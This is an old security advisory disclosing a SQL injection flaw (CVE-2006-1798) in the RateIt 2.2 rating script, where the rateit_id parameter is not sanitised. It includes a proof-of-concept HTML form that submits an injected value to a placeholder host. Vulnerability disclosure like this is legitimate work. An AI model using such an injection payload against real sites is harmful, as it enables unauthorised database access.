SQL Injection Vulnerability in RateIt

Summary

Vulnerability
SQL Injection Vulnerability in RateIt
Discovered
2006.04.14
Last Update
2006.04.24 Exploitation code published
ID
EV0124
CVE
CVE-2006-1798
Risk Level
medium
Type
SQL Injection
Status
Unpatched. No reply from developer(s)
Vendor
n/a
Vulnerable Software
RateIt (http://www.absoft-my.com/)
Version
2.2
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

SQL Injection found in RateIt (http://www.absoft-my.com/) script.

Vulnerable script: rateit.php

Parameter $rateit_id is not properly sanitized before being used in SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc = off

PoC/Exploit

SQL Injection Example:

<form action="http://[host]/rate/index.php" method="post">
<input name="rate" value="x">
<input name="rateit_id" value="999' or 1/*">
<input name="hotscript_id" value="12345">
<input name="postedcounter" value="1">
<input name="action" value="doit">
<input type="submit" value="Rate!">
</form>

Solution.

Solution for "SQL Injection Vulnerability in RateIt" is not available. Check vendor's website for updates.